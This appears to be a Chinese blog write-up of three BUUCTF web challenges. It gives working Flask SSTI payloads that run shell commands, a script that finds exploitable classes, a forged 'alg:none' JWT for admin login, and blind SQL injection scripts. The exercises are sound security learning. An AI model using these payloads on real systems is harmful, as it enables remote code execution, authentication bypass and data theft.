2021-03-08

最新推荐文章于 2024-05-16 08:57:42 发布
最新推荐文章于 2024-05-16 08:57:42 发布
阅读量330 收藏
点赞数
分类专栏: BUUCTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53314778/article/details/114543491
版权
web 同时被 2 个专栏收录
52 篇文章 0 订阅
订阅专栏
BUUCTF
46 篇文章 0 订阅
订阅专栏

[CSCCTF 2019 Qual]FlaskLight

知识点

  • SSTI
  • flask模板

启动:

在这里插入图片描述
进入环境,f12可以看到提示get传参search。猜测是个flask的模板注入。

再根据题目等提示 :flask模板,测试一下在这里插入图片描述
接下来就是正常的SSTI注入的测试,注到{{[].__class__.__bases__[0].__subclasses__()}}这里列出了所有的类,
在这里插入图片描述

找了一个经常用的用来RCE的类,发现真的存在,然后继续注,但是不行了,返回了500。
然后我又把后面的.__init__.__globals__['popen']('ls').read()分别测试了一下看看哪里出了问题,发现好像过滤了globals,就有点懵。最后查看WP

编写脚本查找可利用的类
利用subprocess.Popen执行命令

import requests
import re
import html
import time

index = 0
for i in range(170, 1000):
    try:
        url = "http://17ad255a-204e-4624-b878-e3e0d62e526a.node3.buuoj.cn/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
        r = requests.get(url)
        res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)
        time.sleep(0.1)
        # print(res)
        # print(r.text)
        res = html.unescape(res[0])
        print(str(i) + " | " + res)
        if "subprocess.Popen" in res:
            index = i
            break
    except:
        continue
print("indexo of subprocess.Popen:" + str(index))

例一
warnings.catch_warnings

{{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

PS:由于使用[‘globals’]会造成500的服务器错误信息,并且当我直接输入search=globals时页面也会500,觉得这里应该是被过滤了,所以这里采用了字符串拼接的形式[‘glo’+'bals’]

最后获取flag
{{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cat /flasklight/coomme_geeeett_youur_flek ').read()")}}
例二:
class’site._Printer’
{{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}}
获取flag
{{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('cat /flasklight/coomme_geeeett_youur_flek').read()}}
例三:
popen

{{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}} {{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}} {{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}在这里插入图片描述

[HFCTF2020]EasyLogin -wp

app.js代码学习
首先是/static/js/app.js的代码。

/**
 *  或许该用 koa-static 来处理静态文件
 *  路径该怎么配置?不管了先填个根目录XD
 */

function login() {
    const username = $("#username").val();
    const password = $("#password").val();
    const token = sessionStorage.getItem("token");
    $.post("/api/login", {username, password, authorization:token})
        .done(function(data) {
            const {status} = data;
            if(status) {
                document.location = "/home";
            }
        })
        .fail(function(xhr, textStatus, errorThrown) {
            alert(xhr.responseJSON.message);
        });
}

function register() {
    const username = $("#username").val();
    const password = $("#password").val();
    $.post("/api/register", {username, password})
        .done(function(data) {
            const { token } = data;
            sessionStorage.setItem('token', token);
            document.location = "/login";
        })
        .fail(function(xhr, textStatus, errorThrown) {
            alert(xhr.responseJSON.message);
        });
}

function logout() {
    $.get('/api/logout').done(function(data) {
        const {status} = data;
        if(status) {
            document.location = '/login';
        }
    });
}

function getflag() {
    $.get('/api/flag').done(function(data) {
        const {flag} = data;
        $("#username").val(flag);
    }).fail(function(xhr, textStatus, errorThrown) {
        alert(xhr.responseJSON.message);
    });
}

一句一句的学

第一部分

const username = $("#username").val();
const password = $("#password").val();

const作用和var作用相似,但是const赋的值必须初始化且不可修改。

$("#username")为id选择器,获得id为userName的标签,通过.val(),获得这个标签的value的值,赋值给你声明的变量const username在这里插入图片描述
第二部分

const token = sessionStorage.getItem("token");

在这里插入图片描述
第三部分

$.post("/api/login", {username, password, authorization:token})

传送门在这里插入图片描述
也就是使用post访问,前面为url,后面为参数。
第四部分

        .done(function(data) {
            const {status} = data;
            if(status) {
                document.location = "/home";
            }
        })
        .fail(function(xhr, textStatus, errorThrown) {
            alert(xhr.responseJSON.message);

然后是是done方法和fail方法,成功了就重定位到/home目录,失败了就返回异常信息。

const {status} = data;

查了查这个花括号的作用,如下:在这里插入图片描述
然后后面的代码基本都看得懂了

controllers/api.js部分学习

const crypto = require('crypto');
const fs = require('fs')
const jwt = require('jsonwebtoken')

const APIError = require('../rest').APIError;

module.exports = {
    'POST /api/register': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || username === 'admin'){
            throw new APIError('register error', 'wrong username');
        }

        if(global.secrets.length > 100000) {
            global.secrets = [];
        }

        const secret = crypto.randomBytes(18).toString('hex');
        const secretid = global.secrets.length;
        global.secrets.push(secret)

        const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});

        ctx.rest({
            token: token
        });

        await next();
    },

    'POST /api/login': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || !password) {
            throw new APIError('login error', 'username or password is necessary');
        }

        const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;

        const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;

        console.log(sid)

        if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {
            throw new APIError('login error', 'no such secret id');
        }

        const secret = global.secrets[sid];

        const user = jwt.verify(token, secret, {algorithm: 'HS256'});

        const status = username === user.username && password === user.password;

        if(status) {
            ctx.session.username = username;
        }

        ctx.rest({
            status
        });

        await next();
    },

    'GET /api/flag': async (ctx, next) => {
        if(ctx.session.username !== 'admin'){
            throw new APIError('permission error', 'permission denied');
        }

        const flag = fs.readFileSync('/flag').toString();
        ctx.rest({
            flag
        });

        await next();
    },

    'GET /api/logout': async (ctx, next) => {
        ctx.session.username = null;
        ctx.rest({
            status: true
        })
        await next();
    }
};

登录的时候生成了一个jwt令牌 jwt讲解
const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});
然后是admin的话,会输出flag

    'GET /api/flag': async (ctx, next) => {
        if(ctx.session.username !== 'admin'){
            throw new APIError('permission error', 'permission denied');
        }

        const flag = fs.readFileSync('/flag').toString();
        ctx.rest({
            flag
        });

        await next();
    },

于是将算法修改为none进行攻击在这里插入图片描述
在登录页面抓包,更改包
payload:
{"alg":"none","typ":"JWT"}.{"secretid":[],"username": "admin","password": "a","iat": 1587632063}.
在这里插入图片描述
然后用生成的cookie访问,即可拿到flag在这里插入图片描述
解题过程参考链接:WP

[GYCTF2020]Ezsqli

知识点

  • SQL注入
  • 绕过information的过滤
  • ascii偏移

启动:在这里插入图片描述
据题目意思已经很明显是SQL注入了

fuzz一波,在这里插入图片描述
过滤了好多东西,包括用来查询的information关键词,基本上就是考虑盲注了在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
尝试异或注入在这里插入图片描述
发现可行,
他过滤or 我们的information就不能用了
在这里插入图片描述
换成innodb_table_stats绕过也无果在这里插入图片描述
发现sys.x$schema_flattened_keys 或者 sys.schema_table_statistics_with_buffer可以替代上面那个,果然条条道路通罗马在这里插入图片描述
接下来就可以写脚本判断表名了

import requests
url = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/'
payload = '2||ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{},1))={}'
result = ''
for j in range(1,500):
    for i in range(32, 127):
        py = payload.format(j,i)
        post_data = {'id': py}
        re = requests.post(url, data=post_data)
        if 'Nu1L' in re.text:
            result += chr(i)
            print(result)
            break

在这里插入图片描述
并且这里还过滤了join,查列就非常困难了在这里插入图片描述
但是这个只能查表,接着就只能用无列名注入了
对构造盲注无列名注入了解的还不够彻底
无列名注入讲解

盲注无列名构造 参考文章
Y1ng师傅参考文献

payload
1^((1,'G')>(select * from f1ag_1s_h3r3_hhhhh))^1
原理大概就是使用单引号里面的字母与表中数据的字母进行比较,其实就是进行ascii的比较,比如:
b>a
abd>abc
baaaa>abbb //第一个字母大就整体判断为大,如果第一个字母相同再对第二个进行比较。
那么进过了简单的手工尝试可以知道前面几位为FLAG{
那么后面的用脚本跑一下即可。
buu的环境访问太快会429,可以慢慢来,跑出几位就网flag里加几个,慢慢的可以跑出来。当然有能力直接控制线程当然最好。
exp:

import requests
url = 'http://bb098698-4715-4fbf-853c-23007c53cb41.node3.buuoj.cn/index.php'
flag='FLAG{'
for j in range(1,50):
    for x in range(28, 128):
        flag1 = flag+chr(x)
        payload = "0^((select 1,'{}')>(select * from f1ag_1s_h3r3_hhhhh))".format(flag1)

        data = {'id': payload}
        re = requests.post(url=url, data=data)

        if 'Nu1L' in re.text:
            break;

    flag  += chr(x-1)
    print(flag)
    print(flag.lower()) #因为出来的flag是大写,这边全部转为小写

在这里插入图片描述

无尽星河-深空
关注
专栏目录
“百度杯” CTF比赛 十月场 Web-登录
qq_34106499的博客
02-18 1537
1. mysql盲注及脚本编写 2. .git泄露
CTF-Web2-(简单绕过登录过滤)
热门推荐
→_→
07-14 1万+
登陆一下好吗?? 做CTF题时,不要忽略任何信息,要先收集信息,再分解信息,对于出题者的信息,不可全信,也不可不信,具体的来说就是要仔细分析,出题者的意图。 那么,根据这一题的信息,我们了解到这是一道过滤了某些字符的登录注入题型,为了进一步了解点击链接开始答题: 打开链接,我们就能看到一个很简单的一个登录页面,我们可以按F12查看前端代码,看是否有隐藏的信息,结果没有,接下来我们就要考虑给出的信息中提到过滤了一切,我们测试一下,看是否过滤了所有的字符: 点击登录: 从返回的信息.
ctfWEB之后台登录
weixin_30340745的博客
06-02 1785
1、后台登录 格式:flag:{xxx} 解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 打开链接: 查看源码,发现一段被注释的代码,有用: 仔细分析这一句: $sql = "SELECT * FROM admin WHERE username = 'admin' and password ...
网络安全CTF系列培训教程之Web篇-burpsuite爆破弱密码
ctfayang的博客
03-11 2600
本文介绍了Burpsuite的设置以及如何爆破攻击web 密码。
CNVD-2021-49104——泛微E-Office文件上传漏洞
最新发布
2401_84264692的博客
05-16 408
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。需要完整版PDF学习资源。构造请求上传文件即可。
2021-03-08 C# 读取Excell方法一.zip
03-08
本示例“2021-03-08 C# 读取Excel方法一.zip”聚焦于如何利用C#来读取Excel文件中的数据。Excel文件通常用于存储和管理大量结构化数据,因此在各种业务场景中,能够高效地读取和处理Excel文件是至关重要的。 在C#中...
methodflexSoftware:2021-03-08
03-08
关于Laravel Laravel是一个Web应用程序框架,具有表达力强,优雅的语法。 我们认为,发展必须是一种令人愉快的,富有创造力的经历,才能真正实现。 Laravel减轻了许多Web项目中使用的常见任务,从而减轻了开发过程中...
文本(2021-03-08 191156).txt
04-26
文本(2021-03-08 191156).txt
UL 746F-2021-08-03.pdf
02-16
UL746F STANDARD FOR SAFETY Polymeric Materials - Flexible DielectricFilm Materials for Use in Printed WiringBoards and Flexible Materials Interconnect Constructions
node-hello-worldWebIDE-UISimpleTC-2021-03-25T08-41-09.219Z-github:为工具链创建
03-25
标题中的“node-hello-worldWebIDE-UISimpleTC-2021-03-25T08-41-09.219Z-github”表明这是一个基于Node.js的项目,它可能是一个简单的“Hello World”教程,用于展示如何在Web集成开发环境中(Web IDE)使用...
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
BugKu-CTF(web篇)---login2
Nailaoyyds的博客
04-02 3548
目录 login2 base64解码 审计分析语句 制作payload 拿到flag login2 从登录框入手 抓包分析一下,发现了一个小tip base64解码 审计分析语句 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样 payload为username=admin' union select 1,md5(123)#&passwor...
ctf wed login.php,ctfWEB之后台登录
weixin_39759600的博客
03-27 850
格式:flag:{xxx}解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php打开链接: 查看源码,发现一段被注释的代码,有用: 仔细分析这一句:$sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'";其实这...
python的常用函数模块_Python常用模块/函数
weixin_39806808的博客
11-21 349
一、文件和目录操作创建、删除、修改、拼接、获取当前目录、遍历目录下的文件、获取文件大小、修改日期、判断文件是否存在等。略二、日期和时间(内置模块:time、datatime、calendar)1.time.time() #返回自1970年1月1日0点到当前时间经过的秒数实例1:获取某函数执行的时间,单位秒import timebefore = time.time()func1after = ti...
如何使用Koa搭建静态资源文件服务器
weixin_33696106的博客
04-17 438
1.node.js Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行环境,执行Javascript的速度非常快,性能非常好。 Node.js 使用了一个事件驱动、非阻塞式 I/O 的模型,使其轻量又高效。 Node.js 的包管理器 npm,是全球最大的开源库生态系统。 2.Koa Koa就是一种简单好用的 Web 框架。它的特点是优雅、简洁、表达力强、自由度高...
[HFCTF2020]EasyLogin
07-09 1120
注册账号登陆之后,可以看到一个GET FLAG 的按钮,直接点击会提示权限不足。 查看源码发现了app.js,node.js写的后端框架是koa,逻辑代码应该是controllers下的api.js. koa的框架结构如图所示 /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username = $("#username").val(); ...
解释服务器端模板注入 渗透
qq_42468111的博客
12-03 402
环境建设: 我们从一个用python编写的基本的烧瓶Web应用程序开始(我将使用python 2),如下所示: from flask import * app = Flask(__name__) @app.route("/") def home(): return "Hello, World!" if __name__ == "__main__": app.run(de...
ezsqli
qq_40710190的博客
09-28 460
ezsqli 根据题目的提示这是一道关于SQL注入的题,这几天恶补了一波SQL注入,记录一下解题过程 1.前景知识 MySQL数据库注入基础 报错基于GET的注入GET-Error based PHP绕过and和or过滤 先看下来吧,如果有不会的在回头来前景知识这里找好了 2.正题进入 二话不说,F12查看源码 <script type="text/javascript"> name = $_POST['name']; $password = $_POST['pw'];
node静态资源服务器的搭建----访问本地文件夹(搭建可访问静态文件的服务器)
xd_yangxiaoromg的博客
08-30 1万+
我们的目标是实现一个可访问静态文件的服务器,即可以在浏览器访问文件夹和文件,通过点击来查看文件。 1.先创建一个文件夹anydoor,然后在该文件夹里npm init一个package.json文件,按如下图所示创建文件夹和文件(node_models,package-lock.json是安装生成,不用自己创建)。为了方便管理,我们把一些设置性和公共的参数放在defaultConfig.js里,...
扮演个python2021-01-01 周五 7° -6° 多云~晴 西南风2级 2021-01-02 周六 8° -2° 多云 东风2级 2021-01-03 周日 8° -1° 多云 东北风3级 2021-01-04 周一 9° 1° 多云~阴 东北风2级 2021-01-05 周二 4° 0° 阴 东北风3级 2021-01-06 周三 2° -7° 阴 北风3级 2021-01-07 周四 -4° -7° 多云 北风4级 2021-01-08 周五 1° -9° 晴~多云 西北风3级 2021-0
05-17
2021-01-03 周日 8° -1° 多云 东北风3级 2021-01-04 周一 9° 1° 多云~阴 东北风2级 2021-01-05 周二 4° 0° 阴 东北风3级 2021-01-06 周三 2° -7° 阴 北风3级 2021-01-07 周四 -4° -7° 多云 北风4级 2021-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值